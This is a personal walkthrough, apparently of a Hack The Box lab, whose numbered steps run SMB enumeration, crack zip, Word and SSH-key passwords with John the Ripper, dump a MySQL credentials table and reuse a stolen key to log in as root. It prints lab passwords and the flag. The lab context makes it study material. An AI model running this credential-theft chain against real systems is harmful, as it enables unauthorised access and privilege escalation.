Our next host is a workstation used by an employee for their day-to-day work. These types of hosts are often used to exchange files with other employees and are typically administered by administrators over the network. During a meeting with the client, we were informed that many internal users use this host as a jump host. The focus is on securing and protecting files containing sensitive information.

CHALLENGE: 10.129.223.93

Question 1 - Examine the second target and submit the contents of flag.txt in /root/ as the answer.
1. nmap -sCV 10.129.223.93
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 12:51 CDT
Nmap scan report for 10.129.223.93
Host is up (0.010s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SKILLS-MEDIUM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-03-16T17:51:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

2. run a lil smbmap -> 
3. smbmap -H 10.129.223.93
[+] IP: 10.129.223.93:445	Name: 10.129.223.93                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	SHAREDRIVE                                        	READ ONLY	SHARE-DRIVE
	IPC$                                              	NO ACCESS	IPC Service (skills-medium server (Samba, Ubuntu))

4. smbclient -N '\\10.129.223.93\SHAREDRIVE\'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 10 04:39:38 2022
  ..                                  D        0  Thu Feb 10 04:35:54 2022
  Docs.zip                            N     6724  Thu Feb 10 04:39:38 2022

		14384136 blocks of size 1024. 10222636 blocks available
smb: \> get Docs.zip
getting file \Docs.zip of size 6724 as Docs.zip (9.8 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> exit

5. unzip Docs.zip 
Archive:  Docs.zip
[Docs.zip] Documentation.docx password: 
   skipping: Documentation.docx      incorrect password
6. zip2john Docs.zip > zip.hash 
7. IF NOT DONE ALREADY -> hashcat password.list -r custom.rule --stdout | sort -u > mut_password.list
8. john zip.hash --wordlist=mut_password.list 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Destiny2022!     (Docs.zip/Documentation.docx)    
9. unzip Docs.zip 
10. we see a new file called Documentation.docx
11. looks liek we need a password for that too 
12. office2john Documentation.docx > docx.hash 
13. john docx.hash --wordlist=mut_password.list 
14. john docx.hash --wordlist=mut_password.list 
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
987654321        (Documentation.docx)    

15. scroll down and we find 
jason:C4mNKjAtL2dydsYa6

16. ssh jason@10.129.223.93 
17. mysql -u jason -pC4mNKjAtL2dydsYa6
18. show databases; 
19. use users;
20. show tables;
21. select * from creds; 
22. 101 | dennis             | 7AUgWWQEiMPdqx 
23. dennis:7AUgWWQEiMPdqx
24. ssh dennis@10.129.223.93 
25. ls -lah
26. cd .ssh 
27. cat id_rsa -> copy and paste into file on host machine 
28. ssh2john dennis_key > dennis.hash 
29. john dennis.hash --wordlist=mut_password.list 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd12020!   (dennis_key)     
1g 0:00:00:00 DONE (2025-03-16 13:44) 33.33g/s 2378Kp/s 2378Kc/s 2378KC/s p@ssw0rd12011!..P@ssw0rd12021

30. chmod 600 dennis_key 
31... now this i dont get and had to look up but theyre saying root and dennis are the same and he reused the password / passphrase for root? how were we suppose to know? i have no clue.. 
32. ssh -i dennis_key root@10.129.223.93 
enter passphrase from john crack -> P@ssw0rd12020!
33. cat flag.txt -> HTB{PeopleReuse_PWsEverywhere!}




john dennis.hash --wordlist=mut_password.list 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd12020!   (dennis_key)     
1g 0:00:00:00 DONE (2025-03-16 13:44) 33.33g/s 2378Kp/s 2378Kc/s 2378KC/s p@ssw0rd12011!..P@ssw0rd12021
